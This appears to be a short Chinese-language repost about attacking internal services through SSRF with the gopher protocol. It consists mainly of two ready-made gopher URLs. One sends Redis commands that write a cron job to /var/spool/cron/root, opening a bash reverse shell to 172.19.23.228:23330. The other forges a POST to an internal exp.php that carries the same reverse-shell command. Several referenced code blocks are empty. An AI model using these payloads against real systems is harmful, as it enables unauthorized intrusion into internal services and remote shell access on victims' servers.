gopher协议的攻击利用

转自paper.tuisec.win/detail.jsp 

攻击内网redis

攻击redis常见exp为：

对应的gopher协议为：

gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >&/dev/tcp/172.19.23.228/23330>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a

攻击FastCGI 略

攻击内网Vulnerability Web

Gopher 可以模仿 POST 请求，故探测内网的时候不仅可以利用 GET 形式的 PoC（经典的 Struts2），还可以使用 POST 形式的 PoC。

一个只能 127.0.0.1 访问的 exp.php，内容为：

利用方式：

构造gopher协议的url：

gopher://127.0.0.1:80/_POST /exp.php HTTP/1.1%0d%0aHost:127.0.0.1%0d%0aUser-Agent: curl/7.43.0%0d%0aAccept:*/*%0d%0aContent-Length:49%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0a%0d%0ae=bash -i >%2526/dev/tcp/172.19.23.228/23330>%25261null